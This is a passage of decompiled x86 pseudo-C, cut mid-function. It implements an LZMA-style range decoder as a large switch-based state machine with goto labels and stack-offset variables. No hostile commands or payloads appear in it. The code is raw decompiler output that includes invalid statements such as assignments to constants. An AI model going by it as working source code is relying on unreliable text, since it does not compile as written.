                                                  													__eax =  *(__ebp - 0x24);
                                                  													 *(__ebp - 0x80) = 0x16;
                                                  													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                  													__eax =  *(__ebp - 0x28);
                                                  													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                  													__eax =  *(__ebp - 0x2c);
                                                  													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                  													__eax = 0;
                                                  													__eflags =  *(__ebp - 0x38) - 7;
                                                  													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                  													__al = __al & 0x000000fd;
                                                  													__eax = (__eflags >= 0) - 1 + 0xa;
                                                  													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                  													__eax =  *(__ebp - 4);
                                                  													__eax =  *(__ebp - 4) + 0x664;
                                                  													__eflags = __eax;
                                                  													 *(__ebp - 0x58) = __eax;
                                                  													goto L69;
                                                  												}
                                                  												__eax =  *(__ebp - 4);
                                                  												__ecx =  *(__ebp - 0x38);
                                                  												 *(__ebp - 0x84) = 8;
                                                  												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                  												while(1) {
                                                  													L132:
                                                  													 *(_t613 - 0x54) = _t606;
                                                  													goto L133;
                                                  												}
                                                  											case 8:
                                                  												__eflags =  *(__ebp - 0x40);
                                                  												if( *(__ebp - 0x40) != 0) {
                                                  													__eax =  *(__ebp - 4);
                                                  													__ecx =  *(__ebp - 0x38);
                                                  													 *(__ebp - 0x84) = 0xa;
                                                  													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                  												} else {
                                                  													__eax =  *(__ebp - 0x38);
                                                  													__ecx =  *(__ebp - 4);
                                                  													__eax =  *(__ebp - 0x38) + 0xf;
                                                  													 *(__ebp - 0x84) = 9;
                                                  													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                  													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                  												}
                                                  												while(1) {
                                                  													L132:
                                                  													 *(_t613 - 0x54) = _t606;
                                                  													goto L133;
                                                  												}
                                                  											case 9:
                                                  												__eflags =  *(__ebp - 0x40);
                                                  												if( *(__ebp - 0x40) != 0) {
                                                  													goto L89;
                                                  												}
                                                  												__eflags =  *(__ebp - 0x60);
                                                  												if( *(__ebp - 0x60) == 0) {
                                                  													goto L171;
                                                  												}
                                                  												__eax = 0;
                                                  												__eflags =  *(__ebp - 0x38) - 7;
                                                  												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                  												__eflags = _t259;
                                                  												0 | _t259 = _t259 + _t259 + 9;
                                                  												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                  												goto L76;
                                                  											case 0xa:
                                                  												goto L0;
                                                  											case 0xb:
                                                  												__eflags =  *(__ebp - 0x40);
                                                  												if( *(__ebp - 0x40) != 0) {
                                                  													__ecx =  *(__ebp - 0x24);
                                                  													__eax =  *(__ebp - 0x20);
                                                  													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                  												} else {
                                                  													__eax =  *(__ebp - 0x24);
                                                  												}
                                                  												__ecx =  *(__ebp - 0x28);
                                                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                  												goto L88;
                                                  											case 0xc:
                                                  												L99:
                                                  												__eflags =  *(__ebp - 0x6c);
                                                  												if( *(__ebp - 0x6c) == 0) {
                                                  													 *(__ebp - 0x88) = 0xc;
                                                  													goto L170;
                                                  												}
                                                  												__ecx =  *(__ebp - 0x70);
                                                  												__eax =  *(__ebp - 0xc);
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												_t334 = __ebp - 0x70;
                                                  												 *_t334 =  *(__ebp - 0x70) + 1;
                                                  												__eflags =  *_t334;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												__eax =  *(__ebp - 0x2c);
                                                  												goto L101;
                                                  											case 0xd:
                                                  												L37:
                                                  												__eflags =  *(__ebp - 0x6c);
                                                  												if( *(__ebp - 0x6c) == 0) {
                                                  													 *(__ebp - 0x88) = 0xd;
                                                  													goto L170;
                                                  												}
                                                  												__ecx =  *(__ebp - 0x70);
                                                  												__eax =  *(__ebp - 0xc);
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												_t122 = __ebp - 0x70;
                                                  												 *_t122 =  *(__ebp - 0x70) + 1;
                                                  												__eflags =  *_t122;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												L39:
                                                  												__eax =  *(__ebp - 0x40);
                                                  												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                  												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                  													goto L48;
                                                  												}
                                                  												__eflags = __ebx - 0x100;
                                                  												if(__ebx >= 0x100) {
                                                  													goto L54;
                                                  												}
                                                  												L41:
                                                  												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                  												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                  												__ecx =  *(__ebp - 0x58);
                                                  												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                  												 *(__ebp - 0x48) = __eax;
                                                  												__eax = __eax + 1;
                                                  												__eax = __eax << 8;
                                                  												__eax = __eax + __ebx;
                                                  												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  												__ax =  *__esi;
                                                  												 *(__ebp - 0x54) = __esi;
                                                  												__edx = __ax & 0x0000ffff;
                                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                                  												if( *(__ebp - 0xc) >= __ecx) {
                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  													__cx = __ax;
                                                  													 *(__ebp - 0x40) = 1;
                                                  													__cx = __ax >> 5;
                                                  													__eflags = __eax;
                                                  													__ebx = __ebx + __ebx + 1;
                                                  													 *__esi = __ax;
                                                  												} else {
                                                  													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                  													 *(__ebp - 0x10) = __ecx;
                                                  													0x800 = 0x800 - __edx;
                                                  													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                  													__ebx = __ebx + __ebx;
                                                  													 *__esi = __cx;
                                                  												}
                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  												 *(__ebp - 0x44) = __ebx;
                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                  													goto L39;
                                                  												} else {
                                                  													goto L37;
                                                  												}
                                                  											case 0xe:
                                                  												L46:
                                                  												__eflags =  *(__ebp - 0x6c);
                                                  												if( *(__ebp - 0x6c) == 0) {
                                                  													 *(__ebp - 0x88) = 0xe;
                                                  													goto L170;
                                                  												}
                                                  												__ecx =  *(__ebp - 0x70);
                                                  												__eax =  *(__ebp - 0xc);
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												_t156 = __ebp - 0x70;
                                                  												 *_t156 =  *(__ebp - 0x70) + 1;
                                                  												__eflags =  *_t156;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												while(1) {
                                                  													L48:
                                                  													__eflags = __ebx - 0x100;
                                                  													if(__ebx >= 0x100) {
                                                  														break;
                                                  													}
                                                  													__eax =  *(__ebp - 0x58);
                                                  													__edx = __ebx + __ebx;
                                                  													__ecx =  *(__ebp - 0x10);
                                                  													__esi = __edx + __eax;
                                                  													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                  													__ax =  *__esi;
                                                  													 *(__ebp - 0x54) = __esi;
                                                  													__edi = __ax & 0x0000ffff;
                                                  													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  													__eflags =  *(__ebp - 0xc) - __ecx;
                                                  													if( *(__ebp - 0xc) >= __ecx) {
                                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  														__cx = __ax;
                                                  														_t170 = __edx + 1; // 0x1
                                                  														__ebx = _t170;
                                                  														__cx = __ax >> 5;
                                                  														__eflags = __eax;
                                                  														 *__esi = __ax;
                                                  													} else {
                                                  														 *(__ebp - 0x10) = __ecx;
                                                  														0x800 = 0x800 - __edi;
                                                  														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  														__ebx = __ebx + __ebx;
                                                  														 *__esi = __cx;
                                                  													}
                                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  													 *(__ebp - 0x44) = __ebx;
                                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                                  														continue;
                                                  													} else {
                                                  														goto L46;
                                                  													}
                                                  												}
                                                  												L54:
                                                  												_t173 = __ebp - 0x34;
                                                  												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                  												__eflags =  *_t173;
                                                  												goto L55;
                                                  											case 0xf:
                                                  												L58:
                                                  												__eflags =  *(__ebp - 0x6c);
                                                  												if( *(__ebp - 0x6c) == 0) {
                                                  													 *(__ebp - 0x88) = 0xf;
                                                  													goto L170;
                                                  												}
                                                  												__ecx =  *(__ebp - 0x70);
                                                  												__eax =  *(__ebp - 0xc);
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												_t203 = __ebp - 0x70;
                                                  												 *_t203 =  *(__ebp - 0x70) + 1;
                                                  												__eflags =  *_t203;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												L60:
                                                  												__eflags = __ebx - 0x100;
                                                  												if(__ebx >= 0x100) {
                                                  													L55:
                                                  													__al =  *(__ebp - 0x44);
                                                  													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                  													goto L56;
                                                  												}
                                                  												L61:
                                                  												__eax =  *(__ebp - 0x58);
                                                  												__edx = __ebx + __ebx;
                                                  												__ecx =  *(__ebp - 0x10);
                                                  												__esi = __edx + __eax;
                                                  												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                  												__ax =  *__esi;
                                                  												 *(__ebp - 0x54) = __esi;
                                                  												__edi = __ax & 0x0000ffff;
                                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                                  												if( *(__ebp - 0xc) >= __ecx) {
                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  													__cx = __ax;
                                                  													_t217 = __edx + 1; // 0x1
                                                  													__ebx = _t217;
                                                  													__cx = __ax >> 5;
                                                  													__eflags = __eax;
                                                  													 *__esi = __ax;
                                                  												} else {
                                                  													 *(__ebp - 0x10) = __ecx;
                                                  													0x800 = 0x800 - __edi;
                                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  													__ebx = __ebx + __ebx;
                                                  													 *__esi = __cx;
                                                  												}
                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  												 *(__ebp - 0x44) = __ebx;
                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                  													goto L60;
                                                  												} else {
                                                  													goto L58;
                                                  												}
                                                  											case 0x10:
                                                  												L109:
                                                  												__eflags =  *(__ebp - 0x6c);
                                                  												if( *(__ebp - 0x6c) == 0) {
                                                  													 *(__ebp - 0x88) = 0x10;
                                                  													goto L170;
                                                  												}
                                                  												__ecx =  *(__ebp - 0x70);
                                                  												__eax =  *(__ebp - 0xc);
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												_t365 = __ebp - 0x70;
                                                  												 *_t365 =  *(__ebp - 0x70) + 1;
                                                  												__eflags =  *_t365;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												goto L111;
                                                  											case 0x11:
                                                  												goto L69;
                                                  											case 0x12:
                                                  												__eflags =  *(__ebp - 0x40);
                                                  												if( *(__ebp - 0x40) != 0) {
                                                  													__eax =  *(__ebp - 0x58);
                                                  													 *(__ebp - 0x84) = 0x13;
                                                  													__esi =  *(__ebp - 0x58) + 2;
                                                  													while(1) {
                                                  														L132:
                                                  														 *(_t613 - 0x54) = _t606;
                                                  														goto L133;
                                                  													}
                                                  												}
                                                  												__eax =  *(__ebp - 0x4c);
                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                  												__ecx =  *(__ebp - 0x58);
                                                  												__eax =  *(__ebp - 0x4c) << 4;
                                                  												__eflags = __eax;
                                                  												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                  												goto L130;
                                                  											case 0x13:
                                                  												__eflags =  *(__ebp - 0x40);
                                                  												if( *(__ebp - 0x40) != 0) {
                                                  													_t469 = __ebp - 0x58;
                                                  													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                  													__eflags =  *_t469;
                                                  													 *(__ebp - 0x30) = 0x10;
                                                  													 *(__ebp - 0x40) = 8;
                                                  													L144:
                                                  													 *(__ebp - 0x7c) = 0x14;
                                                  													goto L145;
                                                  												}
                                                  												__eax =  *(__ebp - 0x4c);
                                                  												__ecx =  *(__ebp - 0x58);
                                                  												__eax =  *(__ebp - 0x4c) << 4;
                                                  												 *(__ebp - 0x30) = 8;
                                                  												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                  												L130:
                                                  												 *(__ebp - 0x58) = __eax;
                                                  												 *(__ebp - 0x40) = 3;
                                                  												goto L144;
                                                  											case 0x14:
                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                  												__eax =  *(__ebp - 0x80);
                                                  												 *(_t613 - 0x88) = _t533;
                                                  												goto L1;
                                                  											case 0x15:
                                                  												__eax = 0;
                                                  												__eflags =  *(__ebp - 0x38) - 7;
                                                  												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                  												__al = __al & 0x000000fd;
                                                  												__eax = (__eflags >= 0) - 1 + 0xb;
                                                  												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                  												goto L120;
                                                  											case 0x16:
                                                  												__eax =  *(__ebp - 0x30);
                                                  												__eflags = __eax - 4;
                                                  												if(__eax >= 4) {
                                                  													_push(3);
                                                  													_pop(__eax);
                                                  												}
                                                  												__ecx =  *(__ebp - 4);
                                                  												 *(__ebp - 0x40) = 6;
                                                  												__eax = __eax << 7;
                                                  												 *(__ebp - 0x7c) = 0x19;
                                                  												 *(__ebp - 0x58) = __eax;
                                                  												goto L145;
                                                  											case 0x17:
                                                  												L145:
                                                  												__eax =  *(__ebp - 0x40);
                                                  												 *(__ebp - 0x50) = 1;
                                                  												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                  												goto L149;
                                                  											case 0x18:
                                                  												L146:
                                                  												__eflags =  *(__ebp - 0x6c);
                                                  												if( *(__ebp - 0x6c) == 0) {
                                                  													 *(__ebp - 0x88) = 0x18;
                                                  													goto L170;
                                                  												}
                                                  												__ecx =  *(__ebp - 0x70);
                                                  												__eax =  *(__ebp - 0xc);
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												_t484 = __ebp - 0x70;
                                                  												 *_t484 =  *(__ebp - 0x70) + 1;
                                                  												__eflags =  *_t484;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												L148:
                                                  												_t487 = __ebp - 0x48;
                                                  												 *_t487 =  *(__ebp - 0x48) - 1;
                                                  												__eflags =  *_t487;
                                                  												L149:
                                                  												__eflags =  *(__ebp - 0x48);
                                                  												if( *(__ebp - 0x48) <= 0) {
                                                  													__ecx =  *(__ebp - 0x40);
                                                  													__ebx =  *(__ebp - 0x50);
                                                  													0 = 1;
                                                  													__eax = 1 << __cl;
                                                  													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                  													__eax =  *(__ebp - 0x7c);
                                                  													 *(__ebp - 0x44) = __ebx;
                                                  													while(1) {
                                                  														 *(_t613 - 0x88) = _t533;
                                                  														goto L1;
                                                  													}
                                                  												}
                                                  												__eax =  *(__ebp - 0x50);
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                  												__eax =  *(__ebp - 0x58);
                                                  												__esi = __edx + __eax;
                                                  												 *(__ebp - 0x54) = __esi;
                                                  												__ax =  *__esi;
                                                  												__edi = __ax & 0x0000ffff;
                                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                                  												if( *(__ebp - 0xc) >= __ecx) {
                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  													__cx = __ax;
                                                  													__cx = __ax >> 5;
                                                  													__eax = __eax - __ecx;
                                                  													__edx = __edx + 1;
                                                  													__eflags = __edx;
                                                  													 *__esi = __ax;
                                                  													 *(__ebp - 0x50) = __edx;
                                                  												} else {
                                                  													 *(__ebp - 0x10) = __ecx;
                                                  													0x800 = 0x800 - __edi;
                                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                  													 *__esi = __cx;
                                                  												}
                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                  													goto L148;
                                                  												} else {
                                                  													goto L146;
                                                  												}
                                                  											case 0x19:
                                                  												__eflags = __ebx - 4;
                                                  												if(__ebx < 4) {
                                                  													 *(__ebp - 0x2c) = __ebx;
                                                  													L119:
                                                  													_t393 = __ebp - 0x2c;
                                                  													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                  													__eflags =  *_t393;
                                                  													L120:
                                                  													__eax =  *(__ebp - 0x2c);
                                                  													__eflags = __eax;
                                                  													if(__eax == 0) {
                                                  														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                  														goto L170;
                                                  													}
                                                  													__eflags = __eax -  *(__ebp - 0x60);
                                                  													if(__eax >  *(__ebp - 0x60)) {
                                                  														goto L171;
                                                  													}
                                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                  													__eax =  *(__ebp - 0x30);
                                                  													_t400 = __ebp - 0x60;
                                                  													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                  													__eflags =  *_t400;
                                                  													goto L123;
                                                  												}
                                                  												__ecx = __ebx;
                                                  												__eax = __ebx;
                                                  												__ecx = __ebx >> 1;
                                                  												__eax = __ebx & 0x00000001;
                                                  												__ecx = (__ebx >> 1) - 1;
                                                  												__al = __al | 0x00000002;
                                                  												__eax = (__ebx & 0x00000001) << __cl;
                                                  												__eflags = __ebx - 0xe;
                                                  												 *(__ebp - 0x2c) = __eax;
                                                  												if(__ebx >= 0xe) {
                                                  													__ebx = 0;
                                                  													 *(__ebp - 0x48) = __ecx;
                                                  													L102:
                                                  													__eflags =  *(__ebp - 0x48);
                                                  													if( *(__ebp - 0x48) <= 0) {
                                                  														__eax = __eax + __ebx;
                                                  														 *(__ebp - 0x40) = 4;
                                                  														 *(__ebp - 0x2c) = __eax;
                                                  														__eax =  *(__ebp - 4);
                                                  														__eax =  *(__ebp - 4) + 0x644;
                                                  														__eflags = __eax;
                                                  														L108:
                                                  														__ebx = 0;
                                                  														 *(__ebp - 0x58) = __eax;
                                                  														 *(__ebp - 0x50) = 1;
                                                  														 *(__ebp - 0x44) = 0;
                                                  														 *(__ebp - 0x48) = 0;
                                                  														L112:
                                                  														__eax =  *(__ebp - 0x40);
                                                  														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                  														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                  															_t391 = __ebp - 0x2c;
                                                  															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                  															__eflags =  *_t391;
                                                  															goto L119;
                                                  														}
                                                  														__eax =  *(__ebp - 0x50);
                                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                  														__eax =  *(__ebp - 0x58);
                                                  														__esi = __edi + __eax;
                                                  														 *(__ebp - 0x54) = __esi;
                                                  														__ax =  *__esi;
                                                  														__ecx = __ax & 0x0000ffff;
                                                  														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                  														__eflags =  *(__ebp - 0xc) - __edx;
                                                  														if( *(__ebp - 0xc) >= __edx) {
                                                  															__ecx = 0;
                                                  															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                  															__ecx = 1;
                                                  															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                  															__ebx = 1;
                                                  															__ecx =  *(__ebp - 0x48);
                                                  															__ebx = 1 << __cl;
                                                  															__ecx = 1 << __cl;
                                                  															__ebx =  *(__ebp - 0x44);
                                                  															__ebx =  *(__ebp - 0x44) | __ecx;
                                                  															__cx = __ax;
                                                  															__cx = __ax >> 5;
                                                  															__eax = __eax - __ecx;
                                                  															__edi = __edi + 1;
                                                  															__eflags = __edi;
                                                  															 *(__ebp - 0x44) = __ebx;
                                                  															 *__esi = __ax;
                                                  															 *(__ebp - 0x50) = __edi;
                                                  														} else {
                                                  															 *(__ebp - 0x10) = __edx;
                                                  															0x800 = 0x800 - __ecx;
                                                  															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                  															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                  															 *__esi = __dx;
                                                  														}
                                                  														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  														if( *(__ebp - 0x10) >= 0x1000000) {
                                                  															L111:
                                                  															_t368 = __ebp - 0x48;
                                                  															 *_t368 =  *(__ebp - 0x48) + 1;
                                                  															__eflags =  *_t368;
                                                  															goto L112;
                                                  														} else {
                                                  															goto L109;
                                                  														}
                                                  													}
                                                  													__ecx =  *(__ebp - 0xc);
                                                  													__ebx = __ebx + __ebx;
                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                  													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                  													 *(__ebp - 0x44) = __ebx;
                                                  													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                  														__ecx =  *(__ebp - 0x10);
                                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                  														__ebx = __ebx | 0x00000001;
                                                  														__eflags = __ebx;
                                                  														 *(__ebp - 0x44) = __ebx;
                                                  													}
                                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                                  														L101:
                                                  														_t338 = __ebp - 0x48;
                                                  														 *_t338 =  *(__ebp - 0x48) - 1;
                                                  														__eflags =  *_t338;
                                                  														goto L102;
                                                  													} else {
                                                  														goto L99;
                                                  													}
                                                  												}
                                                  												__edx =  *(__ebp - 4);
                                                  												__eax = __eax - __ebx;
                                                  												 *(__ebp - 0x40) = __ecx;
                                                  												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                  												goto L108;
                                                  											case 0x1a:
                                                  												L56:
                                                  												__eflags =  *(__ebp - 0x64);
                                                  												if( *(__ebp - 0x64) == 0) {
                                                  													 *(__ebp - 0x88) = 0x1a;
                                                  													goto L170;
                                                  												}
                                                  												__ecx =  *(__ebp - 0x68);
                                                  												__al =  *(__ebp - 0x5c);
                                                  												__edx =  *(__ebp - 8);
                                                  												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                  												 *( *(__ebp - 0x68)) = __al;
                                                  												__ecx =  *(__ebp - 0x14);
                                                  												 *(__ecx +  *(__ebp - 8)) = __al;
                                                  												__eax = __ecx + 1;
                                                  												__edx = 0;
                                                  												_t192 = __eax %  *(__ebp - 0x74);
                                                  												__eax = __eax /  *(__ebp - 0x74);
                                                  												__edx = _t192;
                                                  												goto L80;
                                                  											case 0x1b:
                                                  												L76:
                                                  												__eflags =  *(__ebp - 0x64);
                                                  												if( *(__ebp - 0x64) == 0) {
                                                  													 *(__ebp - 0x88) = 0x1b;
                                                  													goto L170;
                                                  												}
                                                  												__eax =  *(__ebp - 0x14);
                                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  												__eflags = __eax -  *(__ebp - 0x74);
                                                  												if(__eax >=  *(__ebp - 0x74)) {
                                                  													__eax = __eax +  *(__ebp - 0x74);
                                                  													__eflags = __eax;
                                                  												}
                                                  												__edx =  *(__ebp - 8);
                                                  												__cl =  *(__eax + __edx);
                                                  												__eax =  *(__ebp - 0x14);
                                                  												 *(__ebp - 0x5c) = __cl;
                                                  												 *(__eax + __edx) = __cl;
                                                  												__eax = __eax + 1;
                                                  												__edx = 0;
                                                  												_t275 = __eax %  *(__ebp - 0x74);
                                                  												__eax = __eax /  *(__ebp - 0x74);
                                                  												__edx = _t275;
                                                  												__eax =  *(__ebp - 0x68);
                                                  												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  												_t284 = __ebp - 0x64;
                                                  												 *_t284 =  *(__ebp - 0x64) - 1;
                                                  												__eflags =  *_t284;
                                                  												 *( *(__ebp - 0x68)) = __cl;
                                                  												L80:
                                                  												 *(__ebp - 0x14) = __edx;
                                                  												goto L81;
                                                  											case 0x1c:
                                                  												while(1) {
                                                  													L123:
                                                  													__eflags =  *(__ebp - 0x64);
                                                  													if( *(__ebp - 0x64) == 0) {
                                                  														break;
                                                  													}
                                                  													__eax =  *(__ebp - 0x14);
                                                  													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  													__eflags = __eax -  *(__ebp - 0x74);
                                                  													if(__eax >=  *(__ebp - 0x74)) {
                                                  														__eax = __eax +  *(__ebp - 0x74);
                                                  														__eflags = __eax;
                                                  													}
                                                  													__edx =  *(__ebp - 8);
                                                  													__cl =  *(__eax + __edx);
                                                  													__eax =  *(__ebp - 0x14);
                                                  													 *(__ebp - 0x5c) = __cl;
                                                  													 *(__eax + __edx) = __cl;
                                                  													__eax = __eax + 1;
                                                  													__edx = 0;
                                                  													_t414 = __eax %  *(__ebp - 0x74);
                                                  													__eax = __eax /  *(__ebp - 0x74);
                                                  													__edx = _t414;
                                                  													__eax =  *(__ebp - 0x68);
                                                  													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                  													__eflags =  *(__ebp - 0x30);
                                                  													 *( *(__ebp - 0x68)) = __cl;
                                                  													 *(__ebp - 0x14) = _t414;
                                                  													if( *(__ebp - 0x30) > 0) {
                                                  														continue;
                                                  													} else {
                                                  														L81:
                                                  														 *(__ebp - 0x88) = 2;
                                                  														goto L1;
                                                  													}
                                                  												}
